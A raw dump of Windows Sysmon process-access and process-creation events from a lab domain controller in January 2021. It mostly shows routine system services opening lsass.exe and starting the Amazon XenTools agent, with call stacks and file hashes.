13:09:44.537{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001294Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001293Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001292Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001291Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001290Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001289Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001288Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001287Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001286Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001285Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001284Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001283Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001282Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001281Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001280Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001279Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001278Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001277Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001276Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001275Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001274Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4286-6000-0A00-000000009A01}8441112C:\Windows\system32\services.exe{08A6967A-4298-6000-2D00-000000009A01}2412C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001273Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4298-6000-2D00-000000009A01}2412C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001272Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4286-6000-0A00-000000009A01}8441184C:\Windows\system32\services.exe{08A6967A-4298-6000-2D00-000000009A01}2412C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001271Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.530{08A6967A-4298-6000-2D00-000000009A01}2412C:\Program Files\Amazon\XenTools\LiteAgent.exe1.0xenagentXENIFACEAmazon Inc.xenagent.exe"C:\Program Files\Amazon\XenTools\LiteAgent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=3727559C2C2FE26EE668086FAF992815,SHA256=8130E7A850E0A088CB46F2595F7418CE9D73CE2F7750FC017ABC5CF3DED05F06,IMPHASH=C8B18E9A517CB77EA7AB3E7295D84FE8{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001270Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.520{08A6967A-428F-6000-2700-000000009A01}24642488C:\Windows\system32\conhost.exe{08A6967A-4298-6000-2C00-000000009A01}2748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001269Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 